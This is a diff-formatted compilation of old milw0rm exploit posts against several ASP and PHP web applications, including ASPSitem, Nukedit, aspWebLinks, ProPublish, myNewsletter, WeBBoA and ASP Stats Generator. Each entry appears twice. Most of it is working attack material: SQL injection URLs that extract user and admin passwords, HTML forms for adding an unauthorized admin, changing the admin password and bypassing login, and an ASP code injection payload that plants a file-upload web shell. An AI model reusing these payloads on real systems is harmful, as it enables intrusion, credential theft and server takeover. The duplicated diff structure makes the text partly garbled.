Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
|
||||
This exploits works on ASPSitem <= 2.0.
|
||||
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
|
||||
SQL injection ->
|
||||
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
|
||||
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
|
||||
id%20like%201
|
||||
with this example remote attacker can leak userid 1's login information from database.
|
||||
Read others private messages ->
|
||||
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
|
||||
|
||||
# nukedx.com [2006-05-27]
|
||||
|
||||
# milw0rm.com [2006-05-28]
|
||||
ASPSitem <= 2.0 Multiple Vulnerabilities.
|
||||
Contacts > ICQ: 10072 MSN/Mail: nukedx@nukedx.com web: www.nukedx.com
|
||||
This exploits works on ASPSitem <= 2.0.
|
||||
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
|
||||
SQL injection ->
|
||||
GET -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
|
||||
EXAMPLE -> http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20
|
||||
id%20like%201
|
||||
with this example remote attacker can leak userid 1's login information from database.
|
||||
Read others private messages ->
|
||||
GET/EXAMPLE -> http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
|
||||
|
||||
# nukedx.com [2006-05-27]
|
||||
|
||||
# milw0rm.com [2006-05-28]
|
||||
|
|
|
@ -1,69 +1,69 @@
|
|||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>
|
||||
|
||||
<div bgcolor="#000000">
|
||||
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm("You are submitting information to an external page.\nAre you sure?");">
|
||||
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
|
||||
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User
|
||||
Name
|
||||
: </b></font>
|
||||
<input type="text" name="name" value="" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname
|
||||
Name</font><br>
|
||||
<font face="Verdana" size="2" color="#FF0000"><b>User
|
||||
Mail
|
||||
: </b></font>
|
||||
<input type="text" name="email" value="" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example:
|
||||
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
|
||||
|
||||
<font face="Verdana" size="2" color="#FF0000"><b>User
|
||||
Ýd
|
||||
: </b></font>
|
||||
<input type="text" name="id" value="" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
|
||||
Admin</font><br>
|
||||
<font face="Verdana" size="2" color="#FF0000"><b>User Country :
|
||||
</b>
|
||||
</font>
|
||||
<select size="1" name="country">
|
||||
<option value="0">Choose Country</option>
|
||||
<option value="Turkey">Turkey</option>
|
||||
</select> <font size="1" color="#C0C0C0" face="Arial"> Example:
|
||||
Turkey</font><br>
|
||||
|
||||
<b>
|
||||
|
||||
<font face="Verdana" size="2" color="#FF0000">User </font>
|
||||
<font face="Verdana" size="2" color="#0000FF">Pass </font>
|
||||
<font face="Verdana" size="2" color="#FF0000">
|
||||
: </font></b>
|
||||
|
||||
<input type="text" name="password" value="Password" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
|
||||
<b>
|
||||
<font face="Verdana" size="2" color="#FF0000">User </font>
|
||||
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">
|
||||
: </font></b>
|
||||
|
||||
<input type="text" name="passwordre" value="Re Password" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
|
||||
|
||||
<font face="Verdana" size="2" color="#FF0000"><b>Form Action :
|
||||
</b>
|
||||
</font>
|
||||
|
||||
<input type="text" name="adres" value="profileupdate.asp" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example:
|
||||
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>
|
||||
|
||||
<p>
|
||||
|
||||
<input type="submit" name="Submit" value="Change"> </p>
|
||||
|
||||
<br>
|
||||
|
||||
</form>
|
||||
|
||||
</div></body></html>
|
||||
|
||||
# milw0rm.com [2006-05-29]
|
||||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>
|
||||
|
||||
<div bgcolor="#000000">
|
||||
<form name="InputForm" method="post" target="_blank" onsubmit="return window.confirm("You are submitting information to an external page.\nAre you sure?");">
|
||||
<b><font color="#808080" face="Verdana">Speedy Forum User Pass Change //
|
||||
ajann</font></b><p><font face="Verdana" size="2" color="#FF0000"><b>User
|
||||
Name
|
||||
: </b></font>
|
||||
<input type="text" name="name" value="" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example: Surname
|
||||
Name</font><br>
|
||||
<font face="Verdana" size="2" color="#FF0000"><b>User
|
||||
Mail
|
||||
: </b></font>
|
||||
<input type="text" name="email" value="" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example:
|
||||
<a href="mailto:mail@domain.com" target="_blank">mail@domain.com</a></font><br>
|
||||
|
||||
<font face="Verdana" size="2" color="#FF0000"><b>User
|
||||
Ýd
|
||||
: </b></font>
|
||||
<input type="text" name="id" value="" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example: Ýd:1
|
||||
Admin</font><br>
|
||||
<font face="Verdana" size="2" color="#FF0000"><b>User Country :
|
||||
</b>
|
||||
</font>
|
||||
<select size="1" name="country">
|
||||
<option value="0">Choose Country</option>
|
||||
<option value="Turkey">Turkey</option>
|
||||
</select> <font size="1" color="#C0C0C0" face="Arial"> Example:
|
||||
Turkey</font><br>
|
||||
|
||||
<b>
|
||||
|
||||
<font face="Verdana" size="2" color="#FF0000">User </font>
|
||||
<font face="Verdana" size="2" color="#0000FF">Pass </font>
|
||||
<font face="Verdana" size="2" color="#FF0000">
|
||||
: </font></b>
|
||||
|
||||
<input type="text" name="password" value="Password" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
|
||||
<b>
|
||||
<font face="Verdana" size="2" color="#FF0000">User </font>
|
||||
<font face="Verdana" size="2" color="#0000FF">RePass</font><font face="Verdana" size="2" color="#FF0000">
|
||||
: </font></b>
|
||||
|
||||
<input type="text" name="passwordre" value="Re Password" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example: 123456</font><br>
|
||||
|
||||
<font face="Verdana" size="2" color="#FF0000"><b>Form Action :
|
||||
</b>
|
||||
</font>
|
||||
|
||||
<input type="text" name="adres" value="profileupdate.asp" size="20">
|
||||
<font size="1" color="#C0C0C0" face="Arial"> Example:
|
||||
http://[target]/[path]/profileu<WBR>pdate.asp</font></p>
|
||||
|
||||
<p>
|
||||
|
||||
<input type="submit" name="Submit" value="Change"> </p>
|
||||
|
||||
<br>
|
||||
|
||||
</form>
|
||||
|
||||
</div></body></html>
|
||||
|
||||
# milw0rm.com [2006-05-29]
|
||||
|
|
|
@ -1,43 +1,43 @@
|
|||
################ KAPDA - Security Science Researchers Institute #################
|
||||
#Advisory : http://www.kapda.ir/advisory-337.html
|
||||
#Vendor : http://www.nukedit.com/
|
||||
#What is : Nukedit is a Free Content Management
|
||||
#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable!
|
||||
#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir
|
||||
#Vulnerabale versions : <= 4.9.6
|
||||
#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com
|
||||
#Solution : update to new version of nukedit .
|
||||
#Change "http://victim.com/nukedit/utilities/register.asp"
|
||||
################ KAPDA - Security Science Researchers Institute #################
|
||||
|
||||
<html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head>
|
||||
<body>
|
||||
<font face="Verdana" Size="1"><br>
|
||||
Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br>
|
||||
Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br>
|
||||
Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br>
|
||||
Fill the blank and submit . After that login with your email ! + your password .<p>
|
||||
<form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp">
|
||||
<input type="hidden" name="action" value="addDB"></p>
|
||||
<br><br><br>Username :<input type="text" name="username" size="50" style="float: left; font-family: Verdana; font-size: 7pt">
|
||||
<input type="hidden" name="company" size="30" value="MSN">
|
||||
<input type="hidden" name="Url" size="30" value="http://www.lol.ir">
|
||||
<input type="hidden" name="address" size="30" value="System32">
|
||||
<input type="hidden" name="county" size="30" value="00">
|
||||
<input type="hidden" name="zip" size="10" value="12345">
|
||||
<input type="hidden" name="country" value="XPL">
|
||||
<input type="hidden" name="phone" size="15" value="12345678">
|
||||
<input type="hidden" name="fax" size="15" value="87654321">
|
||||
<br><br><br>Your E-mail : <input type="text" name="email" size="30" style="float: left; font-family: Verdana; font-size: 7pt">
|
||||
<br><br><br>Your Password : <input type="password" name="password" size="20" style="float: left; font-family: Verdana; font-size: 7pt">
|
||||
<input type= "hidden" name="groupid" value="1">
|
||||
<input type="hidden" name="IP" value="10.9.8.7">
|
||||
<br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br>
|
||||
<!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) -->
|
||||
</font>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
# milw0rm.com [2006-05-29]
|
||||
################ KAPDA - Security Science Researchers Institute #################
|
||||
#Advisory : http://www.kapda.ir/advisory-337.html
|
||||
#Vendor : http://www.nukedit.com/
|
||||
#What is : Nukedit is a Free Content Management
|
||||
#Vulnerability : Unauthorized Admin Add Exploit if "register.asp" be enable!
|
||||
#Discovered : 3nitro - farhadkey {AT} kapda [d0t] ir
|
||||
#Vulnerabale versions : <= 4.9.6
|
||||
#Grtz to : Irannetjob.com, Maskofgod.net, Hamid.ir, ihsteam.com, simorhg-ev.com, hat-squad.com
|
||||
#Solution : update to new version of nukedit .
|
||||
#Change "http://victim.com/nukedit/utilities/register.asp"
|
||||
################ KAPDA - Security Science Researchers Institute #################
|
||||
|
||||
<html><head><title>Kapda HTML PoC For Nukedit <= 4.9.6</title>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"></head>
|
||||
<body>
|
||||
<font face="Verdana" Size="1"><br>
|
||||
Kapda HTML PoC For Nukedit <= 4.9.6 (With Security Patch) Unauthorized Admin Add Exploit<br>
|
||||
Discovered and coded by 3nitro - farhadkey {AT} kapda [dot] ir <br>
|
||||
Change the form's action in source : "http://victim.com/nukedit/utilities/register.asp"<br>
|
||||
Fill the blank and submit . After that login with your email ! + your password .<p>
|
||||
<form name="frmUser" method="post" action="http://victim.com/nukedit/utilities/register.asp">
|
||||
<input type="hidden" name="action" value="addDB"></p>
|
||||
<br><br><br>Username :<input type="text" name="username" size="50" style="float: left; font-family: Verdana; font-size: 7pt">
|
||||
<input type="hidden" name="company" size="30" value="MSN">
|
||||
<input type="hidden" name="Url" size="30" value="http://www.lol.ir">
|
||||
<input type="hidden" name="address" size="30" value="System32">
|
||||
<input type="hidden" name="county" size="30" value="00">
|
||||
<input type="hidden" name="zip" size="10" value="12345">
|
||||
<input type="hidden" name="country" value="XPL">
|
||||
<input type="hidden" name="phone" size="15" value="12345678">
|
||||
<input type="hidden" name="fax" size="15" value="87654321">
|
||||
<br><br><br>Your E-mail : <input type="text" name="email" size="30" style="float: left; font-family: Verdana; font-size: 7pt">
|
||||
<br><br><br>Your Password : <input type="password" name="password" size="20" style="float: left; font-family: Verdana; font-size: 7pt">
|
||||
<input type= "hidden" name="groupid" value="1">
|
||||
<input type="hidden" name="IP" value="10.9.8.7">
|
||||
<br><br><br><input type="submit" value="Create Account" id="submit1" name="submit1"><br>
|
||||
<!-- Nukedit Exploit Discovered and coded by 3nitro (farhadkey {AT} kapda [D0T] ir) -->
|
||||
</font>
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
# milw0rm.com [2006-05-29]
|
||||
|
|
|
@ -1,79 +1,79 @@
|
|||
<!--
|
||||
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
|
||||
# Author : ajann
|
||||
# Dork : aspWebLinks 2.0
|
||||
|
||||
SQL INJECTION:
|
||||
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
|
||||
-->
|
||||
|
||||
|
||||
<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
|
||||
<form method='POST' action='links.asp?action=modifyconfigprocess'><input
|
||||
type='hidden' name='txtConfigID' value='1'><input type='hidden'
|
||||
name='txtSkinName' value='default'><table border='0' width='100%'
|
||||
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative
|
||||
Password:</b></font></td><td width='70%'><input type='text'
|
||||
name='txtAdministrativePassword' size='43'
|
||||
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days
|
||||
New:</b></font></td><td width='70%'><input type='text'
|
||||
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'
|
||||
align='right' valign='top'><font face="Tahoma" size="1"
|
||||
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input
|
||||
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td
|
||||
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
|
||||
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input
|
||||
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td
|
||||
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
|
||||
color="black"><b>Category Header:</b></font></td><td width='70%'><input
|
||||
type='text' name='txtCategoryHeader' size='43' value='<b>Select A
|
||||
Category:</b>'></td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Category
|
||||
Columns:</b></font></td><td width='70%'><input type='text'
|
||||
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'
|
||||
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub
|
||||
Category Header:</b></font></td><td width='70%'><input type='text'
|
||||
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick
|
||||
or ADD your link:'></td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category
|
||||
Description:</b></font></td><td width='70%'><input type='radio' value='YES'
|
||||
name='txtShowCatDescription' checked >YES<input type='radio' value='NO'
|
||||
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on
|
||||
home page:</b></font></td><td width='70%'><input type='radio' value='YES'
|
||||
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'
|
||||
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New
|
||||
items on home page:</b></font></td><td width='70%'><input type='text'
|
||||
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'
|
||||
align='right' valign='top'><font face="Tahoma" size="1"
|
||||
color="black"><b>Show Whats Hot on home page:</b></font></td><td
|
||||
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked
|
||||
>YES<input type='radio' value='NO' name='txtShowWhatsHot'
|
||||
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font
|
||||
face="Tahoma" size="1" color="black"><b>Require approval for link and review
|
||||
additions:</b></font></td><td width='70%'><input type='radio' value='YES'
|
||||
name='txtNeedApproval' checked >YES<input type='radio' value='NO'
|
||||
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot
|
||||
items on home page:</b></font></td><td width='70%'><input type='text'
|
||||
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'
|
||||
align='right' valign='top'><font face="Tahoma" size="1"
|
||||
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input
|
||||
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats
|
||||
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font
|
||||
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td
|
||||
width='70%'><input type='text' name='txtWhatsHotHeader' size='43'
|
||||
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links
|
||||
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option
|
||||
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date
|
||||
Added</option><option value='HITS'>Number of
|
||||
Visits</option></td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1"
|
||||
color="black"><b></b></font></td><td width='70%'><input type='submit'
|
||||
value='Update Configuration' name='B1'></td></tr></table></form>
|
||||
|
||||
# milw0rm.com [2006-06-01]
|
||||
<!--
|
||||
# Title : aspWebLinks 2.0 Remote Admin Pass Change Exploit and links.asp SQL Injection
|
||||
# Author : ajann
|
||||
# Dork : aspWebLinks 2.0
|
||||
|
||||
SQL INJECTION:
|
||||
http://[target]/[path]/links.asp?action=reporterror&linkID=221%20union%20select+0,administrativepassword,0,0,0,0,0,0,0+from+config
|
||||
-->
|
||||
|
||||
|
||||
<title>AspWebLink 2.0 Remote Admin Pass Change Exploit</title>
|
||||
<form method='POST' action='links.asp?action=modifyconfigprocess'><input
|
||||
type='hidden' name='txtConfigID' value='1'><input type='hidden'
|
||||
name='txtSkinName' value='default'><table border='0' width='100%'
|
||||
cellspacing='0' cellpadding='3'><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Administrative
|
||||
Password:</b></font></td><td width='70%'><input type='text'
|
||||
name='txtAdministrativePassword' size='43'
|
||||
value='EDITPASSWORD'></td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Days
|
||||
New:</b></font></td><td width='70%'><input type='text'
|
||||
name='txtNumberOfDaysNew' size='43' value='15'></td></tr><tr><td width='30%'
|
||||
align='right' valign='top'><font face="Tahoma" size="1"
|
||||
color="black"><b>Number of Visits Hot:</b></font></td><td width='70%'><input
|
||||
type='text' name='txtHotRating' size='43' value='200'></td></tr><tr><td
|
||||
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
|
||||
color="black"><b>Links Per Page:</b></font></td><td width='70%'><input
|
||||
type='text' name='txtRecordsPerPage' size='43' value='12'></td></tr><tr><td
|
||||
width='30%' align='right' valign='top'><font face="Tahoma" size="1"
|
||||
color="black"><b>Category Header:</b></font></td><td width='70%'><input
|
||||
type='text' name='txtCategoryHeader' size='43' value='<b>Select A
|
||||
Category:</b>'></td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Category
|
||||
Columns:</b></font></td><td width='70%'><input type='text'
|
||||
name='txtCategoryCols' size='43' value='2'></td></tr><tr><td width='30%'
|
||||
align='right' valign='top'><font face="Tahoma" size="1" color="black"><b>Sub
|
||||
Category Header:</b></font></td><td width='70%'><input type='text'
|
||||
name='txtSubCategoryHeader' size='43' value='Select A Sub Category to pick
|
||||
or ADD your link:'></td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Category
|
||||
Description:</b></font></td><td width='70%'><input type='radio' value='YES'
|
||||
name='txtShowCatDescription' checked >YES<input type='radio' value='NO'
|
||||
name='txtShowCatDescription' >NO</td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Show Whats New on
|
||||
home page:</b></font></td><td width='70%'><input type='radio' value='YES'
|
||||
name='txtShowWhatsNew' checked >YES<input type='radio' value='NO'
|
||||
name='txtShowWhatsNew' >NO</td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of New
|
||||
items on home page:</b></font></td><td width='70%'><input type='text'
|
||||
name='txtHowManyNew' size='43' value='10'></td></tr><tr><td width='30%'
|
||||
align='right' valign='top'><font face="Tahoma" size="1"
|
||||
color="black"><b>Show Whats Hot on home page:</b></font></td><td
|
||||
width='70%'><input type='radio' value='YES' name='txtShowWhatsHot' checked
|
||||
>YES<input type='radio' value='NO' name='txtShowWhatsHot'
|
||||
>NO</td></tr><tr><td width='30%' align='right' valign='top'><font
|
||||
face="Tahoma" size="1" color="black"><b>Require approval for link and review
|
||||
additions:</b></font></td><td width='70%'><input type='radio' value='YES'
|
||||
name='txtNeedApproval' checked >YES<input type='radio' value='NO'
|
||||
name='txtNeedApproval' >NO</td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Number of Hot
|
||||
items on home page:</b></font></td><td width='70%'><input type='text'
|
||||
name='txtHowManyHot' size='43' value='10'></td></tr><tr><td width='30%'
|
||||
align='right' valign='top'><font face="Tahoma" size="1"
|
||||
color="black"><b>Whats New Header:</b></font></td><td width='70%'><input
|
||||
type='text' name='txtWhatsNewHeader' size='43' value='<b>Whats
|
||||
New:</b>'></td></tr><tr><td width='30%' align='right' valign='top'><font
|
||||
face="Tahoma" size="1" color="black"><b>Whats Hot Header:</b></font></td><td
|
||||
width='70%'><input type='text' name='txtWhatsHotHeader' size='43'
|
||||
value='<b>Whats Hot:</b>'></td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1" color="black"><b>Sort Links
|
||||
By:</b></font></td><td width='70%'><select size='1' name='txtSortBy'><option
|
||||
selected value='ALPHA'>Alphabetically</option><option value='DATE'>Date
|
||||
Added</option><option value='HITS'>Number of
|
||||
Visits</option></td></tr><tr><td width='30%' align='right'
|
||||
valign='top'><font face="Tahoma" size="1"
|
||||
color="black"><b></b></font></td><td width='70%'><input type='submit'
|
||||
value='Update Configuration' name='B1'></td></tr></table></form>
|
||||
|
||||
# milw0rm.com [2006-06-01]
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
|
||||
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
|
||||
# Exploited by FarhadKey from kapda.ir
|
||||
|
||||
Exploit :
|
||||
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE
|
||||
|
||||
# milw0rm.com [2006-06-03]
|
||||
# ProPublish 2.0 (catid) Remote SQL Injection Vulnerability
|
||||
# Thanks to soot : http://www.securityfocus.com/archive/1/435787/30/0/threaded
|
||||
# Exploited by FarhadKey from kapda.ir
|
||||
|
||||
Exploit :
|
||||
http://[site]/[propublish]/cat.php?catid=-1%20union%20select%201,1,email,1,1,null,1,password,9%20from%20author_news%20/*&catname=CTE
|
||||
|
||||
# milw0rm.com [2006-06-03]
|
||||
|
|
|
@ -1,12 +1,12 @@
|
|||
<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
|
||||
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
|
||||
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
|
||||
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
|
||||
<input type="hidden" name="Password" value="1">
|
||||
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
|
||||
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
|
||||
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
|
||||
</form>
|
||||
</html>
|
||||
|
||||
# milw0rm.com [2006-06-06]
|
||||
<!-- orginal advisory : http://www.kapda.ir/advisory-340.html -->
|
||||
<html><center><h4>KAPDA.ir --- myNewsletter <= 1.1.2 Login bypass exploit</h4><br>change action in source and then submit
|
||||
</center><form name="adminLogin" method="post" action="http://site/newsletter/adminLogin.asp">
|
||||
<input type="hidden" name="UserName" value="<!--'union select 1 from Newsletter_Admin where ''='">
|
||||
<input type="hidden" name="Password" value="1">
|
||||
<center><br><input type="submit" name="Submit" value="Login"></center><br><br>
|
||||
<!-- Discovered and coded by FarhadKey / email : farhadkey [aT} kapda {D0T} net -->
|
||||
<center><a href="http://www.kapda.ir">www.kapda.ir</a></center>
|
||||
</form>
|
||||
</html>
|
||||
|
||||
# milw0rm.com [2006-06-06]
|
||||
|
|
|
@ -12,5 +12,5 @@
|
|||
#Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC
|
||||
|
||||
# nukedx.com [2006-06-11]
|
||||
|
||||
# milw0rm.com [2006-06-11]
|
||||
|
||||
# milw0rm.com [2006-06-11]
|
||||
|
|
|
@ -1,9 +1,9 @@
|
|||
# There is Sql injection WeBBoA Host Script v1.1
|
||||
# Risk=High
|
||||
|
||||
# Exploit:
|
||||
http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
|
||||
|
||||
# Credit: EntriKa
|
||||
|
||||
# milw0rm.com [2006-06-19]
|
||||
# There is Sql injection WeBBoA Host Script v1.1
|
||||
# Risk=High
|
||||
|
||||
# Exploit:
|
||||
http://[SITE]/?islem=host_satin_al&id=-1%20%20union%20select%200,1,2,kul_adi,4,5,6,7,sifre%20from%20members+where+uye_id=1
|
||||
|
||||
# Credit: EntriKa
|
||||
|
||||
# milw0rm.com [2006-06-19]
|
||||
|
|
|
@ -1,51 +1,51 @@
|
|||
/*------------------------------------------------
|
||||
IHS Public advisory
|
||||
-------------------------------------------------*/
|
||||
|
||||
ASP Stats Generator SQL-ASP injection - Code Excution
|
||||
ASP Stats Generator is a powerful website counter, completely written in ASP programming language.
|
||||
The application is able to track web site activity generating graphical and statistical reports.
|
||||
It combines a server side class with a javascript system to get a wide range of visitors' details.
|
||||
http://www.weppos.com
|
||||
|
||||
Credit:
|
||||
The information has been provided by Hamid Ebadi (IHS : IRAN HOMELAND SECURITY)
|
||||
The original article can be found at:
|
||||
|
||||
http://www.IHSteam.com
|
||||
http://www.hamid.ir/security/
|
||||
|
||||
|
||||
Vulnerable Systems:
|
||||
ASP Stats Generator 2.1.1 - 2.1 and below
|
||||
|
||||
SQL injection :
|
||||
|
||||
Example :
|
||||
The following URL can be used to trigger an SQL injection vulnerability in the pages.asp:
|
||||
http://localhost/myasg/pages.asp?order='&mese=1
|
||||
|
||||
Microsoft JET Database Engine error '80040e14'
|
||||
Syntax error in string in query expression 'SUM(Visits) ''.
|
||||
/myasg/pages.asp, line 236
|
||||
|
||||
Exploit :
|
||||
|
||||
http://localhost/asg/pages.asp?order=ASC union select sito_psw,1,1 from tblst_config&mese=1
|
||||
|
||||
|
||||
ASP Code Injection :
|
||||
Input passed to the strAsgSknPageBgColour (and ...) in "settings_skin.asp" isn't properly sanitised before being stored in the "inc_skin_file.asp".
|
||||
This can be exploited to inject arbitrary ASP code.
|
||||
|
||||
Exploit :
|
||||
|
||||
#F9F9F9" : dim path,hstr, mpath, content, filename: mpath=replace(Request.ServerVariables("PATH_TRANSLATED"),"/","\"): content = request("content"): filename = request("filename"): on error resume next: Dim objFSO,f: Set objFSO = Server.CreateObject ("Scripting.FileSystemObject"): if not filename = "" then: response.Write( "Have File.<BR>" ): path = objFSO.GetParentFolderName( mpath ): path = filename: end if: if not content="" then: response.Write( "Contented.<BR>" ): set f = objFSO.CreateTextFile( path ): response.Write( err.Description & "<BR>" ): f.Write( content ): response.Write( err.Description & "<BR>" ): f.close: end if %><%=filename%><BR><%=path%><BR><%= Request("path") %><BR><FORM ID="SForm" method="post"><TABLE width="300" border="1" ID="Table1"><TR><TD><P align="center"><STRONG><FONT size="6">Upload File</FONT></STRONG></P></TD></TR><TR><TD><TEXTAREA name="content" rows="15" cols="46" ><%=content%></TEXTAREA></TD></TR><TR><TD><P align="center">File Name:<%=strAsgMapPathTo%><INPUT type="text" name="filename" value="<%=filename%>" ></P><P align="center"><INPUT type="submit" value="Upload" ID="Submit1" NAME="Submit1"></P></TD></TR></TABLE></FORM><% objFSO = Nothing: on error goto 0: hstr = "
|
||||
[m.r.roohian]
|
||||
attacker can upload "cmd.asp" with this uploader and ...
|
||||
|
||||
|
||||
Solution:
|
||||
use ASP Stats Generator v2.1.2 (18/06/2006 )
|
||||
|
||||
# milw0rm.com [2006-06-19]
|
||||
/*------------------------------------------------
|
||||
IHS Public advisory
|
||||
-------------------------------------------------*/
|
||||
|
||||
ASP Stats Generator SQL-ASP injection - Code Excution
|
||||
ASP Stats Generator is a powerful website counter, completely written in ASP programming language.
|
||||
The application is able to track web site activity generating graphical and statistical reports.
|
||||
It combines a server side class with a javascript system to get a wide range of visitors' details.
|
||||
http://www.weppos.com
|
||||
|
||||
Credit:
|
